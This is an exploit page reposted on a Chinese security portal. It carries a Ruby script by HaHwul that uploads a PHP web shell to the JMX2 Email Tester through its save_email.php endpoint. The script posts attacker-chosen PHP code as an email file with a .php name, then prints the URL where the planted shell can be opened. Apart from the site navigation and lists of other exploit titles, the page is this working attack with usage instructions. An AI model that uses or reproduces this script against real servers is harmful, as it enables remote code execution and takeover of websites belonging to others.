首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
JMX2 Email Tester Remote Shell Upload
来源:http://www.hahwul.com 作者:HaHwul 发布时间:2016-02-16  
# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none

require "net/http"
require "uri"
require 'uri-handler'

if ARGV.length != 2

puts "JMX2 Email Tester Web Shell Uploader"
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
puts "  targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
puts "  phpCode(ex): echo 'zzzzz'"
puts "  Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
puts "  Install GEM: #> gem install uri-handler"
puts "  exploit & code by hahwul[www.hahwul.com]" 
else
target_url = ARGV[0]    # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1]    # PHP Code
shell = shell.to_uri
exp_url = target_url + "/models/save_email.php"
puts shell
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
puts exp_url
request = Net::HTTP::Post.new(uri.request_uri)
request["Accept-Encoding"] = "gzip, deflate"
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
request["Accept"] = "application/json, text/javascript, */*; q=0.01"
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
request["Connection"] = "keep-alive"
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
response = http.request(request)

puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Delta Industrial Automation DC
·Microsoft Windows - AFD.SYS Da
·Wieland wieplan 4.1 Document P
·Network Scanner Version 4.0.0.
·D-Link DCS-930L Authenticated
·Inductive Automation Ignition
·Microsoft Windows WebDAV - BSo
·Inductive Automation Ignition
·FTPShell Client 5.24 - (Create
·XM Easy Personal FTP Server 5.
·Oracle 9i XDB FTP Pass Overflo
·STIMS Buffer - Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved